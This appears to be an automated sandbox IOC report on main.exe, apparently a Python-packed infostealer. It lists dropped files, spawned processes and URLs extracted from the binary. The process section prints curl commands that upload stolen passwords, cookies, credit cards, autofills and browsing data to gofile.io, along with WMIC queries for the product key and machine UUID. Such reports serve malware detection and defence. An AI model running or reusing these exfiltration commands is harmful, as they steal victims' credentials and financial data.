IOC Report
main.exe

loading gif

Files

File Path
Type
Category
Malicious
main.exe
PE32+ executable (console) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\INSTALLER
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\METADATA
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\RECORD
CSV text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\WHEEL
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\top_level.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140_1.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\certifi\cacert.pem
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\INSTALLER
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\METADATA
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\RECORD
CSV text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\WHEEL
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses\LICENSE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses\LICENSE.APACHE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses\LICENSE.BSD
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\INSTALLER
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\LICENSE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\METADATA
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\RECORD
CSV text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\WHEEL
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\top_level.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\libffi-8.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\libssl-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.pdb
MSVC program database ver 7.00, 4096*579 bytes
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\INSTALLER
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\LICENSE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\METADATA
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\RECORD
CSV text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\WHEEL
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\entry_points.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\top_level.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\gen_py\3.11\__init__.py
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\gen_py\3.11\dicts.dat
data
dropped
C:\Users\user\AppData\Local\Temp\prysmax-745773.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\prysmax-745773\information.txt
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\prysmax-745773\prcookies.txt
ASCII text, with very long lines (515), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\prysmax-745773\prhistory.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\prysmax-745773\process_list.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\prysmax-745773\screenshot.png
PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\AppData\Local\Tempcrdrjdmbol.db
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Tempcrhpzreqps.db
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Tempcrisnqbpuw.db
SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
dropped
C:\Users\user\AppData\Local\Tempcrjecpqddi.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Tempcrkqoskfpt.db
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Tempcrqgcuwzfl.db
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Tempcrrtcvdzge.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Tempcrtvqsliim.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 128 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\main.exe
"C:\Users\user\Desktop\main.exe"
malicious
C:\Users\user\Desktop\main.exe
"C:\Users\user\Desktop\main.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
C:\Windows\System32\wbem\WMIC.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\tasklist.exe
tasklist
There are 11 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
unknown
http://www.dabeaz.com/ply)F
unknown
https://api.telegram.org/bot
unknown
http://aka.ms/vcpython27
unknown
https://github.com/mhammond/pywin32
unknown
https://coinbase.com)
unknown
https://stake.com)
unknown
https://tiktok.com)
unknown
http://docs.python.org/library/unittest.html
unknown
https://discord.com)
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
http://repository.swisssign.com/3
unknown
http://www.opensource.org/licenses/mit-license.phptrols
unknown
https://tools.ietf.org/html/rfc2388#section-4.4
unknown
http://crl.securetrust.com/SGCA.crl0t
unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
unknown
https://paypal.com)
unknown
https://github.com/pypa/packaging
unknown
http://www.opensource.org/licenses/mit-license.php
unknown
http://stackoverflow.com/questions/19622133/
unknown
https://riotgames.com)
unknown
https://refspecs.linuxfoundation.org/elf/gabi4
unknown
https://xbox.com)
unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
unknown
https://youtube.com)
unknown
http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
unknown
https://tools.ietf.org/html/rfc3610
unknown
https://peps.python.org/pep-0205/
unknown
http://crl.dhimyotis.com/certignarootca.crl
unknown
http://curl.haxx.se/rfc/cookie_spec.html
unknown
http://ocsp.accv.es
unknown
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
unknown
https://api.telegram.org/botp
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
unknown
https://docs.python.org/3/library/pprint.html
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
https://httpbin.org/get
unknown
https://amazon.com)
unknown
https://crunchyroll.com)
unknown
https://exiv2.org/tags.html)
unknown
https://github.com/python-pillow/Pillow/
unknown
https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
unknown
https://api.gofile.io/servers
45.112.123.126
https://wwww.certigna.fr/autorites/0m
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://github.com/python/cpython/issues/86361.
unknown
http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
unknown
https://ebay.com)
unknown
https://httpbin.org/
unknown
https://wwww.certigna.fr/autorites/
unknown
http://repository.swisssign.com/p
unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
unknown
https://palletsprojects.com/donate
unknown
https://playstation.com)
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
unknown
http://repository.swisssign.com/z
unknown
https://sellix.io)
unknown
https://disney.com)
unknown
https://docs.python.org/3/library/multiprocessing.html
unknown
https://docs.python.org/3/library/re.html
unknown
https://github.com/pypa/packaging02d2
unknown
http://github.com/ActiveState/appdirs
unknown
https://wiki.debian.org/XDGBaseDirectorySpecification#state
unknown
http://crl.securetrust.com/STCA.crl
unknown
http://wwwsearch.sf.net/):
unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
unknown
http://www.accv.es/legislacion_c.htm
unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3
unknown
https://riotgames.com)i75802
unknown
http://crl.xrampsecurity.com/XGCA.crl0
unknown
https://bugs.python.org/issue44497.
unknown
http://www.cert.fnmt.es/dpcs/
unknown
https://google.com/mail
unknown
https://packaging.python.org/specifications/entry-points/
unknown
https://github.com/jaraco/jaraco.functools/issues/5
unknown
http://www.accv.es00
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
unknown
